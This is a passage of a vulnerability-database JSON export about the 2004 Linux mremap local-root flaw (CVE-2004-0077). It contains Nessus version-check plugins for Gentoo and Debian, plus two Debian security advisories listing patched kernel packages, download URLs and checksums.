script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-kernel/hppa-dev-sources\", unaffected:make_list(\"ge 2.6.2_p3-r1\"), vulnerable:make_list(\"lt 2.6.2_p3-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/hppa-sources\", unaffected:make_list(\"ge 2.4.24_p0-r1\"), vulnerable:make_list(\"lt 2.4.24_p0-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/planet-ccrma-sources\", unaffected:make_list(\"ge 2.4.21-r5\"), vulnerable:make_list(\"lt 2.4.21-r5\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/openmosix-sources\", unaffected:make_list(\"ge 2.4.22-r4\"), vulnerable:make_list(\"lt 2.4.22-r4\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/development-sources\", unaffected:make_list(\"ge 2.6.3_rc1\"), vulnerable:make_list(\"lt 2.6.3_rc1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-sources-benh\", unaffected:make_list(\"ge 2.4.22-r5\"), vulnerable:make_list(\"lt 2.4.22-r5\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/gentoo-dev-sources\", unaffected:make_list(\"ge 2.6.3_rc1\"), vulnerable:make_list(\"lt 2.6.3_rc1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/vanilla-prepatch-sources\", unaffected:make_list(\"ge 2.4.25_rc4\"), vulnerable:make_list(\"lt 2.4.25_rc4\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/mips-sources\", unaffected:make_list(\"ge 2.4.25_rc4\"), vulnerable:make_list(\"lt 2.4.25_rc4\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/compaq-sources\", unaffected:make_list(\"ge 2.4.9.32.7-r2\"), vulnerable:make_list(\"lt 2.4.9.32.7-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-sources-crypto\", unaffected:make_list(\"ge 2.4.20-r3\"), vulnerable:make_list(\"lt 2.4.20-r3\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/grsec-sources\", unaffected:make_list(\"ge 2.4.24.1.9.13-r1\"), vulnerable:make_list(\"lt 2.4.24.1.9.13-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-sources-dev\", unaffected:make_list(\"ge 2.4.24-r2\"), vulnerable:make_list(\"lt 2.4.24-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/gaming-sources\", unaffected:make_list(\"ge 2.4.20-r8\"), vulnerable:make_list(\"lt 2.4.20-r8\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/wolk-sources\", unaffected:make_list(\"eq 4.9-r4\", \"ge 4.10_pre7-r3\"), vulnerable:make_list(\"lt 4.10_pre7-r3\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/vanilla-sources\", unaffected:make_list(\"ge 2.4.25\"), vulnerable:make_list(\"lt 2.4.25\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/gentoo-sources\", unaffected:make_list(\"eq 2.4.19-r11\", \"eq 2.4.20-r12\", \"ge 2.4.22-r7\"), vulnerable:make_list(\"lt 2.4.22-r7\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/mips-prepatch-sources\", unaffected:make_list(\"ge 2.4.25_pre6-r1\"), vulnerable:make_list(\"lt 2.4.25_pre6-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/hardened-sources\", unaffected:make_list(\"ge 2.4.24-r1\"), vulnerable:make_list(\"lt 2.4.24-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/aa-sources\", unaffected:make_list(\"ge 2.4.23-r1\"), vulnerable:make_list(\"lt 2.4.23-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/gs-sources\", unaffected:make_list(\"ge 2.4.25_pre7-r2\"), vulnerable:make_list(\"lt 2.4.25_pre7-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ia64-sources\", unaffected:make_list(\"ge 2.4.24-r1\"), vulnerable:make_list(\"lt 2.4.24-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/pac-sources\", unaffected:make_list(\"ge 2.4.23-r3\"), vulnerable:make_list(\"lt 2.4.23-r3\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/sparc-dev-sources\", unaffected:make_list(\"ge 2.6.3_rc1\"), vulnerable:make_list(\"lt 2.6.3_rc1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-development-sources\", unaffected:make_list(\"ge 2.6.3_rc1-r1\"), vulnerable:make_list(\"lt 2.6.3_rc1-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/sparc-sources\", unaffected:make_list(\"ge 2.4.24-r2\"), vulnerable:make_list(\"lt 2.4.24-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/alpha-sources\", unaffected:make_list(\"ge 2.4.21-r4\"), vulnerable:make_list(\"lt 2.4.21-r4\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/xfs-sources\", unaffected:make_list(\"ge 2.4.24-r2\"), vulnerable:make_list(\"lt 2.4.24-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-sources\", unaffected:make_list(\"ge 2.4.24-r1\"), vulnerable:make_list(\"lt 2.4.24-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/selinux-sources\", unaffected:make_list(\"ge 2.4.24-r2\"), vulnerable:make_list(\"lt 2.4.24-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/usermode-sources\", unaffected:make_list(\"rge 2.4.24-r1\", \"rge 2.4.26\", \"ge 2.6.3-r1\"), vulnerable:make_list(\"lt 2.6.3-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ck-sources\", unaffected:make_list(\"eq 2.4.24-r1\", \"ge 2.6.2-r1\"), vulnerable:make_list(\"lt 2.6.2-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/win4lin-sources\", unaffected:make_list(\"eq 2.4.23-r2\", \"ge 2.6.2-r1\"), vulnerable:make_list(\"lt 2.6.2-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/mm-sources\", unaffected:make_list(\"ge 2.6.3_rc1-r1\"), vulnerable:make_list(\"lt 2.6.3_rc1-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sys-kernel/hppa-dev-sources / sys-kernel/hppa-sources / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:57:52", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-454-1 : linux-kernel-2.2.22-alpha - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-source-2.2.22", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.22-alpha"], "id": "DEBIAN_DSA-454.NASL", "href": "https://www.tenable.com/plugins/nessus/15291", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-454. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15291);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"454\");\n\n script_name(english:\"Debian DSA-454-1 : linux-kernel-2.2.22-alpha - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-454\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) this problem has been fixed in the\nfollowing versions and architectures :\n\n package arch version \n kernel-source-2.2.22 source 2.2.22-1woody1 \n kernel-image-2.2.22-alpha alpha 2.2.22-2 \n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.22-alpha\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.22\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.22\", reference:\"2.2.22-1woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.22\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.22-generic\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.22-jensen\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.22-nautilus\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.22-smp\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.22\", reference:\"2.2.22-1woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:45", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 438-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 18th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.4.18, kernel-image-2.4.18-1-alpha, kernel-image-2.4.18-1-i386, kernel-image-2.4.18-i386bf, kernel-patch-2.4.18-powerpc\nVulnerability : missing function return value check\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.18-14.2 of kernel-source, version 2.4.18-14 of alpha\nimages, version 2.4.18-12.2 of i386 images, version 2.4.18-5woody7\nof i386bf images and version 2.4.18-1woody4 of powerpc images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nFor the unstable distribution (sid) this problem is fixed in version\n2.4.24-3 for source, i386 and alpha images and version 2.4.22-10 for\npowerpc images.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.2.dsc\n Size/MD5 checksum: 664 38e578dda3dd54a5daa6b8badcac1a58\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.2.diff.gz\n Size/MD5 checksum: 67490 e1ef6246f639481dfd8b3c5b15d8668e\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18.orig.tar.gz\n Size/MD5 checksum: 29818323 24b4c45a04a23eb4ce465eb326a6ddf2\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-14.dsc\n Size/MD5 checksum: 876 7774c946590a5a80332ca920f67cc8ec\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-14.tar.gz\n Size/MD5 checksum: 24477 b9c0ba46774c2da3be69851110d6f2f9\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-12.2.dsc\n Size/MD5 checksum: 1193 b44a4e8f803bb2214bd0c4c3e9f88d81\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-12.2.tar.gz\n Size/MD5 checksum: 70044 f4caad005d02a1c7cadfa73bfc4952fb\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-image-2.4.18-i386bf_2.4.18-5woody7.dsc\n Size/MD5 checksum: 656 e091295663f495df0ea8273703decef0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-image-2.4.18-i386bf_2.4.18-5woody7.tar.gz\n Size/MD5 checksum: 26249 f84d855e356c1f5290f6fe96d9e039c8\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody4.dsc\n Size/MD5 checksum: 713 7f68980058d55c40a037c6666354ffe9\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody4.tar.gz\n Size/MD5 checksum: 79541 bff712e95a6960659a0e96dab9732ed4\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-doc-2.4.18_2.4.18-14.2_all.deb\n Size/MD5 checksum: 1719692 32cb6638a9be7e7f7332152c04854bba\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.2_all.deb\n Size/MD5 checksum: 24133918 306f15a8a6279221394b6a8ac2c5a69c\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody4_all.deb\n Size/MD5 checksum: 79274 8ea5d169fd45e464c1213e729e4e5368\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1_2.4.18-14_alpha.deb\n Size/MD5 checksum: 3363042 9ee4da919ccec99281efdaaae303af73\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-generic_2.4.18-14_alpha.deb\n Size/MD5 checksum: 3512422 47b306297211fd7079abb918bb10ef37\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-smp_2.4.18-14_alpha.deb\n Size/MD5 checksum: 3515048 d0153184a825640d1fe64b905ab98de4\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-generic_2.4.18-14_alpha.deb\n Size/MD5 checksum: 12425644 aa320665938f55d33bfc8a9593e4639f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-smp_2.4.18-14_alpha.deb\n Size/MD5 checksum: 12800414 2901b9a0ff3cabfbb4249ee2cbb94b43\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3412982 cad64cfd789bfa49fe5463a3b4a8a5bd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-386_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3503440 02c707f32c72f98df9002c04006aae6b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-586tsc_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3504340 bd5e69e90ab3be3378f588abbfe23c79\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3504232 6ab9026a1484be3aaf7fa08217ae9c5c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686-smp_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3505300 2ffc58a24a13bf0991be5b982026b6c5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k6_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3504034 a448bb692b10914a3a7f7f1d9b16be96\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k7_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3504256 349318073fbd9b6f3eae2b7bc5d65b54\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-386_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8797608 df96f2969970f149992e74cfd7838919\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-586tsc_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8704208 b29d3a133a3d5485645a1428045481f2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8703628 fdf8ddc2c2fdc0c5ceffb9f34b8dc00f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686-smp_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8959706 da0efa81b152f5ce0e949ba00a58b1f0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k6_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8660826 78ee935b25e3cb8e1d6affc13e78aa35\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k7_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8863038 8b0605e449390dfd819e5543c79fe0e3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-386_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 228532 83d533868f288d4bd7866cf4b3114321\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-586tsc_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 228084 dca93798c731513d7f8908c591fc4992\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 227546 99c579382f1c93af23cdedb9dfdce997\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686-smp_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 231188 cae74563956d0a8757994959b101e5c0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k6_2.4.18-12.2_i386.deb Size/MD5 checksum: 227180 eb3383f20e4123b964a6143fae4be03b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k7_2.4.18-12.2_i386.deb Size/MD5 checksum: 230440 e4875246851ee5dd470bf61af43e2ef6\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-headers-2.4.18-bf2.4_2.4.18-5woody7_i386.deb\n Size/MD5 checksum: 3410436 8238f8f8d03b19071ca774e611c83cd5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-image-2.4.18-bf2.4_2.4.18-5woody7_i386.deb\n Size/MD5 checksum: 6425110 e7e25ace06cd1edbb6967c3cae155e09\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-headers-2.4.18_2.4.18-1woody4_powerpc.deb\n Size/MD5 checksum: 3432656 4116a684a091bbc46a94fcafc03ba50a\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-newpmac_2.4.18-1woody4_powerpc.deb\n Size/MD5 checksum: 9452588 ca305391d3dfe3aa0ab140a047d67df2\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-powerpc_2.4.18-1woody4_powerpc.deb\n Size/MD5 checksum: 10101958 d427f943297e02355545d7fa1a2ab263\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-powerpc-smp_2.4.18-1woody4_powerpc.deb\n Size/MD5 checksum: 10345492 4d6e160cb19df083c4d238f8ff1e4913\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-02-18T00:00:00", "published": "2004-02-18T00:00:00", "id": "DEBIAN:DSA-438-1:101CF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00034.html", "title": "[SECURITY] [DSA 438-1] New Linux 2.4.18 packages fix local root exploit (alpha+i386+powerpc)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:12:54", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 441-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 18th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-patch-2.4.17-mips\nVulnerability : missing function return value check\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.17-0.020226.2.woody5 for mips and mipsel kernel images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the next upload of a 2.4.19 kernel image and in version\n2.4.22-0.030928.3 for 2.4.22 for the mips and mipsel architectures.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody5.dsc\n Size/MD5 checksum: 786 b96d0f387a948cf64a07e6d6c5102b30\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody5.tar.gz Size/MD5 checksum: 1138658 dc1df0219c33c0de14ffd22ea8585ad5\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody5_all.deb\n Size/MD5 checksum: 1138888 ba735096447ec98541c3d35838348e95\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody5_mips.deb\n Size/MD5 checksum: 3475886 0e2394ed3cee2a7dafa2d75a7a2042e6\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody5_mips.deb\n Size/MD5 checksum: 2042458 1585029d1c0b32ce770a29d74b3720f8\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody5_mips.deb\n Size/MD5 checksum: 2042414 83894b6f444b63c57a34051be23f8e04\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody5_mipsel.deb\n Size/MD5 checksum: 3474568 099f3c8bc36668123c2414aa861805c0\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody5_mipsel.deb\n Size/MD5 checksum: 2197826 defe3a975447f16b14f5d52b61991458\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody5_mipsel.deb\n Size/MD5 checksum: 2193704 89fc943ed1530fd0da6ca7a0303acb93\n 